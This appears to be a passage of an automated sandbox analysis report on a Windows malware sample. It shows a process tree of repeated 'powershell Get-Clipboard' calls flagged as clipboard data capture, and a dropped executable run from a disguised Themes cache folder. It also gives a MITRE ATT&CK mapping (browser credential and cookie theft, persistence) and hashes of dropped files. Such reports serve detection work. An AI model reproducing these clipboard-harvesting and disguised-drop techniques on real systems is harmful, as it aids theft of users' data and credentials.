C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5896
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5600
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1860
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5296
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4640
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe1⤵PID:8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe2⤵
- Executes dropped EXE
PID:1836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe1⤵PID:4640
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe2⤵
- Executes dropped EXE
PID:1916
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Authentication Process
1Modify Registry
2System Binary Proxy Execution
1Msiexec
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55KB
MD51cb2072d93588dfe7d4940332ef9168d
SHA1afdecabc09c426323418e9eeb76617a39506af26
SHA2564008b32b1c32737b3780867abd5e647e7161400677973ec72c49dc54063d6a8d
SHA5129d6a056338542848c1f7cdf0d8b80594750c65f4a72794763201491ca21dbc79fd2163582ec792c36cfac6e07dab646da3b14dbc77bc66a61a90f6b8bbeef37d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD511d26665f8830fe1df67662252bb5ef4
SHA1bacd1eeef3b424efc9577a7a9f17934530126dc3
SHA256ab825b0c94505f87bdd85b8653292e958fd76f0a06807d3cde7e3fc119538c9c
SHA512b9c857bd973905c23842cb90567ff14d74fe2e08579b4f3aae837a0f210f51612c38e0c83f8cce16e93cddc4ca62cb8240b037bd5dd2d10b4c6fa75dcfe81c37
-
Filesize
3KB
MD5b74f11022b9de632d24e40f44fdd3041
SHA1ed4747455688046011126a53174046007dbe8c02
SHA2562ea04ba4047cab8a7ea70ef35025f166bcd541bfcc967a1a3e067dfbf7834b82
SHA5127d9e22868c79e0685cd6059b4151c8cdb51078c6b8aa924e2672c05fd5371652c5369d1489eff1093b7e4e4b98b1f9aeee2abd9d06de5df9c89977ea8566ff6b
-
Filesize
280B
MD58165d331a65e980c7f75dba657342854
SHA144967c0388744de38b07e07e3a9cb174854eb7bf
SHA25608d7b1fa1c3cdacb73cb9b34bb51a0516bfeac2f10ec54f2f27469d1c97820a9
SHA512ee23180ed03c5042d6e6343ac2181a6d9ffbbb775e1031222e46b4a61eca4f1caf2dab50269271a07b284e270195595c91ce8c43d4cef77c8873845216546e54
-
Filesize
280B
MD502cf1313b32a8ab2f031cee39bee8fc3
SHA1861cc0ab9ff881460dd6433e37075b822aac9355
SHA2567e7fd13903a8d57f314d9e7dab6fa28975050b63f045eb315e96cccaa17d1e61
SHA512f5464c94391bfb590f6755c2ae6896dd459a2a93d778601caebf272438c2ff127ec5de81dcf8efeec65a56609558477afc7be1c4993977a18fde7b915f7a8700
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
Filesize9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\1e6296a1-756f-4e0f-ab51-0ef05e0aaa46\index-dir\the-real-index
Filesize648B
MD51d8e31efc8a1816c55b68e9b7d939d95
SHA1972284bb7fbff493dcc0096cc6e79752eee65aff
SHA2565e4f36a7e31b90fe6128d887c22ab8c47422ce51e91fa93d78aeec2aa96b6959
SHA51244cf7a668dc48f50f8e5d329e9883184d2c7759b00441a955c144f608f494896afdaf7512e72dc2f0644b0cd21f99bcf4a27159af948d7e3b88d352367a804d3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\1e6296a1-756f-4e0f-ab51-0ef05e0aaa46\index-dir\the-real-index~RFe5823b0.TMP
Filesize648B
MD5c715eeb674f27b6f17fd9d1c5cd1f398
SHA10c0c003bf3391dafd57d34d16f3c58dd2b30f2fc
SHA256bcb91770bdafcc7c35d030d2298623e73555125fe7b51a925261c2cdd2657f92
SHA512d6294c5e6ba0ff71074c1ef7ac1cfd383fd3011d81403878073452157c4622ae0de0866f3a98daa04bf6c89591077895a7177b4bbab57cefe5d186844c7dc0b8
-
Filesize
1KB
MD5673f2d0f984cd92e8f6e490a69c76d64
SHA1f4902ab33a472160504e6020f5c9c616fb630284
SHA2561296334dc34f35c4517eb3de525d3e9dd61eb06e7266481645c5594d4b65af0d
SHA5128ed788852e71437b1524afad8f5d2c01fd0e2ec8ef4155295b2a0e00b944c166fa44b11b2edd7178097fb0f34aeb43978029f36970e317e71b0c9a05f6869fd1
-
Filesize
6KB
MD5ad25ebb050469b0c56cd2a69336f774a
SHA1916c09c5b5a015ed7bc917b0217546836360de86
SHA256f82a6426ce7746dfbdd1c5da60ef2e2b0a0e2e898ea2e3f73a9f9f06d7dc4a7f
SHA5127694a6dbf83ee71a6b759088f28ca1fbd5fdea9c7e440a1e9f572a5faffaf23fce8ee8df9f70fcd7981c048b40b9db20fd7496498b1cc0ecf80afed1d74739d5
-
Filesize
7KB
MD5b3e75180fd96ae911ddf05c4b8a3541d
SHA1e6cd51344d87f5718440a50535823f3fe9ea80ea
SHA256b2c231569fe76ce278869db0f957646fad35759a346b1b0df9abb3daa59c14b7
SHA5128921b1e84e6372bfc48ed0dbdf66c22ccc4ec6805e3500fc7fe904644394ece802d1ed4044582aa1d7155232214d3d3ba38002b85c0fbbec677ce5e98b2647ae
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD532db76c097ec557a5c845c4fc6936f81
SHA19a8f748703a791dcb1634e5e2cd74809b35fc4d8
SHA256cd8d63364626f5b80e0b87494004b084a34ccfa4bc1cec3afee2e1eac53e95a2
SHA5121a6a230389dabacffd9aeee70c9c0f101c58c553f22e76b4de6fde9bcf16e3e04c63f062f959f020f39552a931258a9d6dbe94a39c795b1a492150b8611c925e
-
Filesize
1KB
MD59b282b20d7bde5fb5fee23c7ddb6be8e
SHA1f773443530dc1a5dc80cdeb8e6e7e3dd74f86307
SHA256d685c80432541e2df0814f7c4d0adecb645eb01703195b5ab4ebcc59b1b8e0b1
SHA5121434c9bdd810a22df801aa37d64cd7cf0ad0ed6086516133177feb0eafb988c96ddc67596a95bc4c36d3dadac4665c39cdde7793a70f3c4d7856aa568ee803e9
-
Filesize
1KB
MD5fb849a5e0c126f7c0f54888935c6e132
SHA1ccffb5e6309a46b2e3102e30e894e9fa3641bfb4
SHA256c5623d5fecfee9d970a8339f7b7df5677be8951eaab087694e8dbbd90c4f4cde
SHA512084d5d5c9011707b18833b82917a2957893786195021b3e1886e3f0d2d2e481cb5024aa5acdb7a429396bfef5bdee1f9810306b93df138485a5b9211f40925f7
-
Filesize
1KB
MD542b99cf26660f545cbfa173bc0a00d31
SHA1ffbbd9257d758c753c0d25c591c51dee448d52ad
SHA256d9c91cbaa364905bf16ef136f727b1a9daae1ec57b6a59d7e5f9d8655dae2188
SHA512380f32b9ec6cd43cdc42c956fd230358a16d2ef0427528c41cce1c34d3c964618c54558d62e0b4439400baddbea4b42e9abc350291658c57d388611fcc18cb45
-
Filesize
1KB
MD5e6c3ef762912395eb6a629dad4be5523
SHA18950cda2128d801549bf23da98b9470182c35a0d
SHA256e19851a698aaffcb9291383478d6a13ee28bee8368bea4388dfa29feb0f5b5a8
SHA512f0e9985603e329c86133de101cab4a6c949ea72b7ef175364a5b1d8f5fb3a98d0dd2617908a7a94c3c2b25212e81862434a00a9da7548ab3cd65baf392549ab4
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
132KB
MD5a0e681fdd4613e0fff6fb8bf33a00ef1
SHA16789bacfe0b244ab6872bd3acc1e92030276011e
SHA25686f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2
SHA5126f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196
-
Filesize
190KB
MD5c37bd7a6b677a37313b7ecc4ff01b6f5
SHA179db970c44347bd3566cefb6cabd1995e8e173df
SHA2568c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a
SHA512a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb
-
Filesize
4.7MB
MD52191e768cc2e19009dad20dc999135a3
SHA1f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA2567353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA5125adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970
-
Filesize
2.8MB
MD5eda70f75c18fbc423f32d696e88ff302
SHA162d27cdfc9a0753b95501da75b6d81796ff70b2d
SHA256eb015f75cd2e9025eb59a0f0f0d6d8cc397d96315dce6651cf7d8c42ab2f817a
SHA5126245989e981a672bf04c4fac044fd128951ed75e972162d974027b49159abc8fb4398758de507d84689bf414029cea7637030f787ebfbeeba90f3b2839aec297
-
Filesize
10.2MB
MD5e0f1ad85c0933ecce2e003a2c59ae726
SHA1a8539fc5a233558edfa264a34f7af6187c3f0d4f
SHA256f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb
SHA512714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28
-
Filesize
477KB
MD53bec18862b4d150f18262dd13b17dd1a
SHA193384dd4e9602401f745c78815c6c36a5c94aef3
SHA25603d8026e81f5ce02d663076d0703fa0b1c9cb53c246cdff5ffa8c99354e4589b
SHA512c7b66a243256476bfc467b0a8171e707425b7da21b6beaaaca954b4ccb1eb8249b27c01e46a483af99ef2197beb88e006f8c6c4e65cc7acf39c603098468df12
-
Filesize
7.3MB
MD522ef6d8f6b688e4f23739fc41a809b95
SHA10bda3ce05b756faaf5af9158206a7a6d3f2926a1
SHA25617c4857fd36cb143331ce1402c8bb394a25c8beca48c5abe0616dcea6a4d19a8
SHA5124743c16ffb3c18a950747c728082937ed30e6dcdc1afca0bad0f74eef0f47c42b02bb3dd48bb66ad2fdee041fdb71603c5500ed351f7c16e7622bb01bc4c2ffe
-
Filesize
537KB
MD5d8b4bc789a0c865fb0981611fb5dcdbc
SHA133f9f03117f0bba56a696f2fa089ba893ee951a2
SHA25652aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee
SHA51258d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26
-
Filesize
5.2MB
MD5e2088909e43552ad3e9cce053740185d
SHA124b23dd4cad49340d88b9cb34e54c3ca0eb0d27f
SHA256bba36d4d18d64d9627f54c54fd645c5ba459d25a59acc5228210bd707aef67fd
SHA512dcefacddec38d8941c7d2d7b971b6f22dd0acb4116e48891d1d48a4d88968da12b152ccb7591715c88f8e14c315e235d1c4e6852cc38b9246091c50226900de6
-
C:\Users\Admin\AppData\Local\Programs\desdoran\resources\app.asar.unpacked\node_modules\nva-direct-showof\build\Release\DirectShowModule.node
Filesize276KB
MD5e2c33cb21b568371fb7fbfa13c8f5734
SHA17b1a9ab69b146985f74674c1a950e10900e1ddef
SHA2561304018648602090809bcfd34caf1c882cc9e37199906aa268866bdeb3af4eb1
SHA51264fd93ea133fcb6d9ce027375407ebe2960fa9490389883eb8e2026e35737886508bedb7aec09f905410cc731b6f0ec0a94cda880e685ac8f8449f7ad8b04e61
-
C:\Users\Admin\AppData\Local\Programs\desdoran\resources\app.asar.unpacked\node_modules\nva-pc-inf\build\Release\addon.node
Filesize127KB
MD596947573301161b91a3b305fcce0e58b
SHA1f01553b4b3892f5a2d14e9b6f5151fd80572148c
SHA25675f512662d767dc53af8314b7074a0649d9a8da3805f6bb540604a54a6322cc1
SHA51245e63feae2448b551e90c8bef8f9c5e0a1973b415a0483f9336cbfa24559f738d1a0c412d3df862827335ff2d6dde243fc6b4202c51b8efb3b5d853d5cca90ec
-
C:\Users\Admin\AppData\Local\Programs\desdoran\resources\app.asar.unpacked\node_modules\nva-process-inf\build\Release\addon.node
Filesize121KB
MD588ac36233d6e17320141266bf21a3273
SHA14c48be411cc46d3b9e9e12bcbfe39cd07b1a8f64
SHA256773fac7d580aa03b0a8922a940a2a80b06d5877b1fdcd6f3d761c9c7a331f847
SHA5120135caf1bb4d356fdf0d76d83f0620f7429b008b77106104c36ba27bb1977acc93604a4d09c7960199b5e2309c19f9c8af2e6edb31065d1d168d53649e7a69d8
-
C:\Users\Admin\AppData\Local\Programs\desdoran\resources\app.asar.unpacked\node_modules\sqlite3\lib\binding\napi-v6-win32-unknown-x64\node_sqlite3.node
Filesize1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
C:\Users\Admin\AppData\Local\Programs\desdoran\resources\app.asar.unpacked\node_modules\windowsreveal\build\Release\windowsreveal.node
Filesize154KB
MD586a6c167ee696b9e8ab7f9e0b750234f
SHA1a5714f79efcdfa0c70944f686b595a78662270b5
SHA256e42d2c7e2e786739e2e6a0c9159a583e2cebafda3dc8ad1bf113a3860471cbe0
SHA512db75f44c967cf46f3aca6531fceb390d09e7e1dcb0b3c8b737d1025960374d74f760c71a2bf9742af933d31ab30b6ee19e492f0c61a05d9f8a17e97829cc2686
-
Filesize
611KB
MD51a37f6614ff8799b1c063bc83c157cc3
SHA18238b9295e1dde9de0d6fd20578e82703131a228
SHA2564fbe07f71b706c2a2948eba9a6b1979e23c83342b190723a6ec5251b2d6dad7c
SHA5126677f65a0e26fdc2cff6cef0231f5e5f0713ee7c5cf7f488599a3c7ac3e8365afaec10b35d6145ea58d364151d8bcb08308765693a9797ea99b894d6e8224ac7
-
Filesize
4.9MB
MD56462f53038234de8fef3e6fa31bb46d7
SHA18f610b8bf9ef943411c50b5d7862d616d2232b03
SHA25695f6581afe35f4a89fad311fd8b49c3677b27233a9d0972da18593a4dbb94d14
SHA512475bbd91b16311b2e24db67dd0ff4682730aef9e1a99d4dc9e5ac2734582f10a1671e383820a069255b5250bdeb76681268ceb049b9a8130d6de9db704d043b1
-
Filesize
10KB
MD578e47dda17341bed7be45dccfd89ac87
SHA11afde30e46997452d11e4a2adbbf35cce7a1404f
SHA25667d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA5129574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5
-
Filesize
2KB
MD59bc9d2ce11e018671df17a5c1efdf87f
SHA1386423575eb98a082aaa56bfb103f7facd694d51
SHA256c1166fe8e7351dc54356cb0f983418eefecf36e3a0e6545996daf09663e66e2c
SHA5129755c956921edbe68238161766f04a75117388c3936e3b4cb737d9fb74cb0e026dc7754ee2c313fa35b55f72a9e1034b2f871a9d50a6f8a04e2845c902728194
-
Filesize
286B
MD5551656130fe93120b144322a0bd90207
SHA1fc77b0c0ded1af5fa94147a82ce7ce52dd794ef5
SHA256e680e73d024effd7d5fa0cce50b0662e92397f8f92713173f75be7e95e4d363b
SHA512f8e4e5519df50fceba441de87e51dfcd0b725ca606317e0d97e240bcc2523c12faca80acf380d523302765bad64700d5b19871d02e9a9da932496eeceed82bb4
-
Filesize
1KB
MD5af89694919d90ec95aa7ae0159348cfa
SHA1e8c6c256e3d9e6b9b944b49698b205140c93115f
SHA2561b615f4d08dede2f1c1fb2a92ee484bbf403371ec5ca020055274b8bb2cdc5fd
SHA512d35ffc76fe82e0567aa453b002e7e8d89775996cd6562f556d9336b001b5bf9a1724e4d6f679b36f6b7a59e2d2ab3fab52f6a9202a7bae428b294e103e836ecf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
728B
MD503b80559f2b662646aaa7434392e7e3c
SHA14265c6c3240ff951f62a933cd4bc7a86f32cf3ca
SHA256f7bfe916c5b8a80a5e02772995280682b8bb43f31b79145bc5e2397f5c07696e
SHA512c42a020fe03503e8ef78d5faf580205edab74c15a5b8079db6179d7c75b89de3f1088d1898fe796bd12dea493d3697e2d6ce34edaf1d74d6a3c0e6b100205e55
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir1740_1049589366\e248e570-fea1-49df-b69d-ce66a4ed3e77.tmp
Filesize152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
2KB
MD5b986bc51bcb3c6e42325ee3b0c964ea6
SHA151f0ed9355fc57bfdb5caf73a8304489ace35c01
SHA256604d268f9490c1d9a995a60b217d94f10ff84a56e7323016f92f5c58b928f03b
SHA51298826eaf27c062e379c08cbb381e8583d07ff3e1ae36f2ad3325caba800c375931ff4d6ed9f65d68ac44df7c8959b7084fcce6dc85d84f986371cb6094a0bc1d
-
Filesize
2KB
MD595e5947b30686bcbbe514856ac7101fd
SHA17007645066dd9649d145e5d10a6d044a25869cb2
SHA25625f82d00e23d76fbe1d8f078e5c9ed1e8be92aadb10125789469a91c7c2255c3
SHA5121bf2415a7748bb68fb6b2406bec62f1e61e39101f5efb2c61ba4154688c8cde32b78e5339dd951fd6cdc421ce325a89e2244e37271bb2af058be834554870bb5
-
Filesize
5.0MB
MD5c8fcc6f4855c1cb5b64a57590b0d4a75
SHA1e2741f8636e2bf3389711953ddf0836fdfcc9c34
SHA256e739d4bb39b4448b96616f5bc389724a6cedb44801691c6827c087f7a6545075
SHA512b70019e2543b1c403a8f289d5c7b6ef1c06e23406b7ad7d55831abb827e94a5e36cee5bf1b38a1d54486f6154419eac8a9c6edb031f927d764bc6481efa0e257
-
Filesize
2KB
